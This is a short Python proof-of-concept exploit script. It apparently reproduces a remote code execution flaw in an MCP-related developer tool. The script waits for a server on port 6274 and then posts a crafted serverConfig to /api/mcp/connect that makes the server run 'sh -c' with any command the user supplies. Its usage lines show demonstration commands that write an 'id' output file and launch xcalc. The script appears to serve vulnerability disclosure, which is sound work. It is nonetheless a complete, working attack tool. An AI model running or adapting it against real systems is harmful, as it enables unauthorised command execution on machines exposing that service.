import subprocess
import time
import requests
import os
import signal
import sys

def reproduce(target_ip, command):
    print(f"[*] Waiting for server to start on port 6274...")
    
    start_time = time.time()
    server_ready = False
    
    while time.time() - start_time < 30:
        try:
            response = requests.get(f"http://{target_ip}:6274", timeout=1)
            if response.status_code == 200:
                server_ready = True
                break
        except requests.exceptions.ConnectionError:
            time.sleep(1)
            continue
    
    if not server_ready:
        print("[!] Server failed to start in time.")
        # Note: Removed the process kill since 'process' variable doesn't exist
        return

    print("[+] Server is up and running.")

    # 4. Send the exploit payload
    print("[*] Sending exploit payload...")
    exploit_url = f"http://{target_ip}:6274/api/mcp/connect"
    
    cmd = "sh"
    args = ["-c", command]
    
    payload = {
        "serverConfig": {
            "command": cmd,
            "args": args,
            "env": {
                "DISPLAY": os.environ.get("DISPLAY", ":0")
            }
        },
        "serverId": "rce_test"
    }
    
    try:
        response = requests.post(exploit_url, json=payload, timeout=5)
        print(f"[*] Server responded: {response.status_code}")
        print(f"[*] Response body: {response.text}")
    except Exception as e:
        print(f"[*] Request failed (this might be expected if the command execution interrupts the connection): {e}")

    print("[+] Payload sent.")

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print(f"Usage: {sys.argv[0]} <target_ip> 'id > /tmp/mcpjam_pwned.txt'")
        print(f"Usage: {sys.argv[0]} <target_ip> 'xcalc'")
        sys.exit(1)
    
    target_ip = sys.argv[1]
    command = sys.argv[2]
    
    reproduce(target_ip, command)